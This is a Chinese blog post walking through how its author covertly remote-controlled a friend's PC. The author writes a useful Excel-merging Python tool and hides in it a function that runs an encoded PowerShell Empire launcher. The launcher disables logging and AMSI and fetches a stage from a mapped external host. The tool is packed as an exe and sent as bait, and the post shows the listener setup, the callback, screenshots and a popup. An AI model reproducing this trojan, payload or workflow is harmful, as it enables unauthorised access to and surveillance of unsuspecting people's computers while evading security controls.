遠(yuǎn)控盆友電腦

寫個(gè)服務(wù)器搭建也要被封,都不知道錯(cuò)在哪里了,無力吐槽。
僅作技術(shù)交流,請(qǐng)勿用于非法用途。

0x00魚的喜好

盆友叫幫忙寫個(gè)程序。需求這樣的,自動(dòng)打開每一張表excel,把表中(包含子表)同類別后的內(nèi)容統(tǒng)計(jì)到一張表上。

需求表.png

0x01準(zhǔn)備魚餌

社工才是木馬的關(guān)鍵,如何使別人想要運(yùn)行你的程序才是走向成功的第一步。對(duì)準(zhǔn)盆友的喜好設(shè)計(jì)的程序,可以解決他工作的問題,運(yùn)行程序當(dāng)然是不用操心的。
如何去實(shí)現(xiàn)程序的功能不是本篇的重點(diǎn),這里直接附上代碼了,看不懂可以直接看注釋,注釋已經(jīng)寫的很細(xì)了。

#! /usr/bin/python3
# -*- coding:utf - 8 -*-
# autho:czy
# 用于表格匯總,老仁總專用
#導(dǎo)入模塊
import xlrd
import xlsxwriter
import os
import subprocess

#打開一個(gè)excel文件
def open_xls(file):
    fh=xlrd.open_workbook(file)
    return fh

#獲取sheet表的個(gè)數(shù)
def getshnum(fh):
    x=0
    #為sheet的數(shù)量
    sh=getsheet(fh)
    for sheet in sh:
        x+=1
    return x

#獲取excel中所有的sheet表
def getsheet(fh):
    return fh.sheets()

#讀取文件內(nèi)容并返回行內(nèi)容
def getFilect(file,shnum):
    
    fh=open_xls(file)
    table=fh.sheets()[shnum]
    # 行數(shù) 
    row_count = table.nrows
    # 獲取每行的數(shù)據(jù)    
    for element in range(row_count):
        #第一列單元格為table_name1以此類推
        table_name_1 = table.row_values(element)[0]
        table_name_2 = table.row_values(element)[1]
        #過濾第三列單元格的空格和換行符
        table_value_temp = str(table.row_values(element)[2]).replace(" ","")
        table_value = table_value_temp.replace("\n","")
        #判斷第一二列內(nèi)容是否存在用于保存數(shù)據(jù)的字典key中
        #如果存在將第三列數(shù)據(jù)保存入字典
        if table_name_2 in table_data.keys():
            table_data.get(table_name_2).append(table_value)
        elif table_name_1 in table_data.keys():
            table_data.get(table_name_1).append(table_value)

#存儲(chǔ)最后的數(shù)據(jù)
def savefile(table_data):
    #保存最后結(jié)果文件
    endfile='E:\\Code\\php\\python\\excel-test\\test.xlsx'
    #打開文件夾新建子表為"啦啦啦"
    workbook = xlsxwriter.Workbook(endfile)
    worksheet = workbook.add_worksheet('啦啦啦')
    #表盒第一行內(nèi)容
    headings = ['類別','內(nèi)容']
    #接收之前的字典
    data = table_data
    #從A1開始以行的形式寫入headings的詩句
    #A2用于保存從A2開始列寫入的數(shù)據(jù),注意只能以列表的方式,每個(gè)元素一個(gè)單元格
    #B2用于保存從B2開始列寫入的數(shù)據(jù),注意只能以列表的方式,每個(gè)元素一個(gè)單元格
    worksheet.write_row('A1',headings)
    A2 = []
    B2 = []

    #從字典中獲取鍵的值
    for data_key in data.keys():
        #將所有鍵存入A2的空列表
        A2.append(data_key)
        #B為空字符串
        B = ""
        #以列表的形式遍歷字典的值
        for i in range(len(data[data_key])):
            #將字典值中得列表依次轉(zhuǎn)化為字符串連接到B
            B += str(data[data_key][i])
        #將已轉(zhuǎn)化為字符串字典的值添加到B2列表
        B2.append(B)

    #A2用于保存從A2開始列寫入的數(shù)據(jù),
    #B2用于保存從B2開始列寫入的數(shù)據(jù)
    worksheet.write_column('A2',A2)
    worksheet.write_column('B2',B2)
    #關(guān)閉表格
    workbook.close()

if __name__=='__main__':
    #定義文件夾的路徑
    dir_path = 'E:/Code/php/python/excel/'
    #定義用于存儲(chǔ)的字典
    table_data = {"運(yùn)營協(xié)作":[],"食品安全":[],"運(yùn)營安全":[],"保安服務(wù)":[],"宿舍管理":[],"團(tuán)隊(duì)管理":[],"倉庫管理":[],"店內(nèi)常規(guī)工作":[],"駐店工程/信息部工作":[]}
    
    #獲取文件夾中文件的絕對(duì)路徑
    for fl in os.listdir(dir_path):
        files_path = str(dir_path + fl)

        #fh為excel表打開后返回的數(shù)據(jù)
        fh=open_xls(files_path)
        #x為表中sheet的數(shù)量
        x=getshnum(fh)
        #x為sheet的數(shù)量
        for shnum in range(x):
            print("正在讀取文件:"+str(fl)+"的第"+str(shnum)+"個(gè)sheet表的內(nèi)容...")
            #rvalue=getFilect將文件添加入字典
            getFilect(files_path,shnum)

    for data_key in table_data.keys():
        #維持原來的順序?qū)ψ值溥^濾重復(fù)的值
        table_data[data_key] = sorted(set(table_data[data_key]),key=table_data[data_key].index)
        #過濾字典中的1、(1)等符號(hào)
        for z in range(len(table_data[data_key])):
            for i in range(1,11):
                x = str(i)+"、"
                y = "(" + str(i) +")"
                table_data[data_key][z] = table_data[data_key][z].replace(x,"")
                table_data[data_key][z] = table_data[data_key][z].replace(y,"")
            
    savefile(table_data)

由于表中涉及盆友公司的信息,這里測(cè)試過程就不寫了。

0x02混入香料

使用滲透神器EMPIRE來實(shí)現(xiàn)我們使用powershell遠(yuǎn)控。

empire.png

配置監(jiān)聽地址
朋友和我不在一個(gè)公司,肯定是不能使用局域網(wǎng)遠(yuǎn)控的,這里就需要一個(gè)端口映射服務(wù)器了,這里我用的是花生殼,現(xiàn)在已經(jīng)實(shí)名認(rèn)證了,大家不要學(xué)了去干壞事哦。

內(nèi)網(wǎng)穿透配置.png

在empire框架中輸入如下命令進(jìn)行監(jiān)聽端口的配置。

#進(jìn)入監(jiān)聽
(Empire) > listeners
#使用http監(jiān)聽模式
(Empire: listeners) > uselistener http
#配置內(nèi)網(wǎng)映射地址喝端口
(Empire: listeners/http) > set Host http://映射地址:端口
#配置本地IP地址
(Empire: listeners/http) >set BindIP 本地IP
#配置本地端口80
(Empire: listeners/http) >set Port 本地端口80
#配置監(jiān)聽名字
(Empire: listeners/http) >set Name test_1
#啟用
(Empire: listeners/http) >execute

監(jiān)聽啟動(dòng)后,會(huì)有如下提示。1listeners currently active,一個(gè)監(jiān)聽已經(jīng)激活

監(jiān)聽激活.png

輸入如下命令獲取powershell遠(yuǎn)控命令。

#進(jìn)入監(jiān)聽
(Empire) > listeners
#獲取powershell代碼
(Empire: listeners) > launcher powershell test_1
powershell.png

0x03裝餌

在剛才的程序代碼中加入一個(gè)函數(shù)來運(yùn)行代碼咯。

def joke():
    code = "powershell -noP -sta -w 1 -enc  SQBGACgAJABQAFMAVgBFAFIAcwBJAG8AbgBUAGEAQgBsAEUALgBQAFMAVgBFAFIAUwBpAE8ATgAuAE0AYQBKAG8AUgAgAC0AZwBFACAAMwApAHsAJABHAFAARgA9AFsAUgBlAEYAXQAuAEEAUwBTAGUAbQBiAEwAWQAuAEcAZQBUAFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAGUAVABGAEkARQBgAGwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJABHAFAARgApAHsAJABHAFAAQwA9ACQARwBQAEYALgBHAGUAVABWAGEAbABVAGUAKAAkAG4AdQBMAEwAKQA7AEkARgAoACQARwBQAEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAFYAYQBsAD0AWwBDAE8ATABMAGUAYwBUAGkAbwBuAFMALgBHAEUATgBFAHIAaQBDAC4ARABJAEMAdABJAG8ATgBhAFIAWQBbAFMAdABSAGkAbgBHACwAUwBZAHMAdABlAE0ALgBPAGIAagBlAEMAVABdAF0AOgA6AG4ARQBXACgAKQA7ACQAdgBBAEwALgBBAEQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAVgBBAEwALgBBAEQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABHAFAAQwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJAB2AEEATAB9AEUATABTAEUAewBbAFMAQwBSAEkAUABUAEIAbABvAGMAawBdAC4AIgBHAGUAdABGAGkAZQBgAEwAZAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAHQAVgBBAGwAdQBFACgAJABuAHUATABMACwAKABOAEUAVwAtAE8AQgBqAEUAQwB0ACAAQwBPAEwAbABFAEMAdABpAE8AbgBzAC4ARwBFAE4ARQBSAEkAQwAuAEgAYQBTAGgAUwBFAHQAWwBTAFQAUgBpAG4AZwBdACkAKQB9AFsAUgBlAGYAXQAuAEEAUwBTAGUAbQBiAGwAWQAuAEcAZQB0AFQAeQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAfAA/AHsAJABfAH0AfAAlAHsAJABfAC4ARwBFAHQARgBpAGUAbABEACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAdABWAGEAbAB1AGUAKAAkAG4AdQBMAEwALAAkAHQAcgB1AGUAKQB9ADsAfQA7AFsAUwBZAHMAVABlAE0ALgBOAGUAdAAuAFMAZQByAFYASQBjAGUAUABvAGkAbgBUAE0AYQBOAEEAZwBFAHIAXQA6ADoARQB4AHAARQBDAHQAMQAwADAAQwBPAG4AVABJAG4AVQBlAD0AMAA7ACQAdwBDAD0ATgBFAHcALQBPAGIASgBFAGMAdAAgAFMAeQBTAFQAZQBtAC4ATgBlAHQALgBXAEUAQgBDAGwAaQBFAE4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHcAYwAuAEgAZQBhAEQAZQBSAHMALgBBAEQARAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAHcAQwAuAFAAcgBvAHgAWQA9AFsAUwB5AFMAVABlAG0ALgBOAEUAVAAuAFcAZQBiAFIAZQBxAFUARQBTAHQAXQA6ADoARABlAGYAYQBVAGwAdABXAGUAYgBQAFIATwBYAFkAOwAkAFcAQwAuAFAAUgBvAHgAWQAuAEMAUgBFAEQARQBuAFQAaQBBAEwAUwAgAD0AIABbAFMAeQBzAHQARQBNAC4ATgBlAFQALgBDAHIAZQBEAEUAbgBUAEkAYQBMAEMAYQBjAEgAZQBdADoAOgBEAGUARgBhAFUATAB0AE4AZQB0AHcAbwBSAGsAQwBSAEUARABlAG4AVABJAEEAbABTADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAHcAYwAuAFAAcgBvAHgAeQA7ACQASwA9AFsAUwB5AFMAdABlAG0ALgBUAEUAWAB0AC4ARQBOAEMATwBkAEkATgBHAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AEIAeQB0AEUAcwAoACcAOQAxADAAMgBlADgAMwBiAGQANQBlAGYAMwBiAGIANAA3AGMAMwAzADMAZgA1AGQAYwBkADkAMgBiADYAMQAyACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAHIARwBTADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBvAFUAbgBUAF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAEIAWABPAHIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAcwBlAHIAPQAnAGgAdAB0AHAAOgAvAC8AMQA4ADkANgB0ADEAdAAxADgAMwAuAGkAbwBrAC4AbABhADoAMQAzADIANgA2ACcAOwAkAHQAPQAnAC8AYQBkAG0AaQBuAC8AZwBlAHQALgBwAGgAcAAnADsAJAB3AEMALgBIAEUAQQBkAEUAcgBTAC4AQQBEAGQAKAAiAEMAbwBvAGsAaQBlACIALAAiAHMAZQBzAHMAaQBvAG4APQBXAG4ARQA4AGQATQBhAHUAOABBAG0AMgAxAEQAawB0AFMAYgB5AG4AQwBQAHYAVwB3AEQARQA9ACIAKQA7ACQARABBAFQAYQA9ACQAVwBDAC4ARABvAHcAbgBsAE8AQQBEAEQAQQB0AGEAKAAkAHMARQByACsAJAB0ACkAOwAkAGkAVgA9ACQAZABhAFQAQQBbADAALgAuADMAXQA7ACQAZABhAHQAQQA9ACQARABBAHQAQQBbADQALgAuACQARABhAFQAYQAuAEwARQBuAEcAdABIAF0AOwAtAGoAbwBJAE4AWwBDAEgAYQByAFsAXQBdACgAJgAgACQAUgAgACQAZABhAHQAYQAgACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA"
    p = subprocess.Popen(code,shell = 'True',stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    p.wait()

安裝pyinstaller用于將Python代碼封裝為exe執(zhí)行文件

#安裝下pyinstaller
pip install pyinstaller
#進(jìn)入到程序存放的路徑,執(zhí)行下面命令
# -F 為單個(gè)文件 -w是windows運(yùn)行 -i是指定圖標(biāo) test.py是之前寫好的程序
pyinstaller -F -w -i heihei.ico hello.py

運(yùn)行后它就會(huì)創(chuàng)建一個(gè)dist的文件夾,文件就在里面(送個(gè)小惡魔圖標(biāo)會(huì)不會(huì)提高了警惕性,哈哈哈)

木馬.png

0x04拋竿

大兄弟來接住這個(gè)毒飼料。


投放毒飼料.png

0x05咬鉤提竿

出現(xiàn)agent說明對(duì)方已經(jīng)回彈自己的shell了。(名稱為P3GTUSB7)

遠(yuǎn)程連接.png

代理已經(jīng)成功上線

agents信息.png

輸入以下命令進(jìn)入shell

interact P3GTUSB7

輸入sc進(jìn)行桌面截圖看看桌面什么樣子

截圖.png

win7的系統(tǒng)好Low

桌面.png

使用usemodule trollsploit/message模塊發(fā)個(gè)消息給他看看

小窗口.png

玩笑告于段落了,我要去好好看書了,看到這篇博客的小朋友不要亂運(yùn)行程序哦。

很好用.png
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • 官網(wǎng) 中文版本 好的網(wǎng)站 Content-type: text/htmlBASH Section: User ...
    不排版閱讀 4,715評(píng)論 0 5
  • linux資料總章2.1 1.0寫的不好抱歉 但是2.0已經(jīng)改了很多 但是錯(cuò)誤還是無法避免 以后資料會(huì)慢慢更新 大...
    數(shù)據(jù)革命閱讀 13,251評(píng)論 2 33
  • 壬辰年二月,春初涉,有友相約仁壽一游。同去者十又五,皆相聚春秋三載。性不同,志相投,山水樂者矣。二五逢休憩,朗日和...
    林云_09ae閱讀 407評(píng)論 4 4
  • 因?yàn)轫?xiàng)目需要,所以準(zhǔn)備了解點(diǎn)這方面的前端開發(fā)技術(shù),話說,以前就知道個(gè)flash ,還真不知道它還有個(gè)兄弟flex ...
    三個(gè)小皮匠閱讀 317評(píng)論 0 0
  • 剛開始接觸寫作,是在初二的時(shí)候。那一年自己寫了一本紙質(zhì)的只有三萬字的小說,盡管現(xiàn)在看上去無論是文筆還是內(nèi)容都十分...
    殺死那個(gè)月亮閱讀 418評(píng)論 18 7

友情鏈接更多精彩內(nèi)容